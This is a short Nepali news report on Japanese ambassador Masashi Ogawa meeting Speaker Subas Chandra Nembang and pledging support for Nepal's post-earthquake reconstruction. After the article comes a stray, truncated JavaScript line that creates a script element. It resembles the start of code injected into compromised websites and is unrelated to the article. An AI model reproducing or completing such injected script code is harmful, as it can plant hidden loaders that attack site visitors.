जापानले नेपालको पूर्ननिर्माणमा सहयोग गर्ने प्रतिवद्धता जनाएको छ। शुक्रबार सिहदरबारमा सभामुख सुवास चन्द्र नेम्वाङसंग भेट गर्दे नेपालका लागी जापानी राजदुत मासाशी ओगावाले नेपाललाई सहयोग गरि पुननिर्माणमा साथ दिन तयार रहेको बताउनुभएको हो। उहाले नेपालको बिपत्तीमा जापान र जापानी जनताको सदैव सकारात्कम साथ हुने समेत उल्लेख गर्नुभयो।

भेटमा उहाले नेपालमा छिटै पुर्ननिर्माणको कार्य सम्पन्न भई बिकासको बाटोमा लम्कने बिश्वास समेत गर्नुभयो। त्यस्तै उहाले भूकम्पपश्चात नेपालमा भईरहेको राहत उद्धार र अन्य बिषयमा पनि चासो व्यक्त गर्नुभएको सभामुख नेम्वाङले जानकारी दिनुभयो। भेटमा नेम्वाङले जापानी सरकारको सहयोग र साथका लागी आभार व्यक्त गर्नुभयो। त्यस्तै उहाले बिपत्तीको अबस्थामा सबै एक भएर पुननिर्माणमा लागेको उल्लेख गर्नुभभएको थियो।

var d=document;var s=d.createElement(‘script’);